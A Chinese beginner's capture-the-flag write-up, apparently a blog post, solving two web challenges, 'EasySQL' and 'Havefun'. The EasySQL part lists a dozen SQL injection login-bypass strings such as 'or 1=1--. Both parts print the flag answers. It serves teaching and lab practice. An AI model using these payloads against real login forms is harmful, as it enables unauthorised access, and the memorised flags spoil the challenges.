前言:
这篇文章还是是为了帮助一些
像我这样的菜鸟
找到简单的题解
今天是2022年的最后一天,
这一年我居然写了72篇文章
获得5枚勋章
还多了14个粉丝
好了不说了,上水题的题解
EasySQL题目描述
解题工具:
不需什么工具,如题名easy sql
解题过程:
输入框都有了注入点就不用说了
先提交
admin 123456
看到提示密码错误
又看到url,就可以直接注入了
user 框里输入1'发现报错
那这题就很简单了
直接输入万能密码获得flag
这里普及一下万能密码
"or "a"="a
')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
'or''='
1'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1%00
虽然有这么多种但目的都是一样的
注:万能密码中"#"是注释掉后半部分的意思
成功获得flag
flag{5a24fe63-f958-416b-898e-aa84b35a8469}
完成
Havefun题目描述
一只很可爱的猫
解题过程:
按下F12发现一段注释的PHP代码
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}逐行分析一下
第一行
$cat=$_GET['cat'];
意思是get一个变量名字为cat
第二行
echo $cat;意思是显示cat
第三行
if($cat=='dog'){意思是判断cat是否等于字符串'dog'
最后一行
echo 'Syc{cat_cat_cat_cat}';显示一堆奇奇怪怪的东西
但应该就是flag(因为看见了"{ }")
分析到此解法就很明确了,
get一个cat变量让他等于'dog'即可获得flag
成功获得flag
flag{abbab8c1-d399-415b-8e08-34752ecfb468}
完成
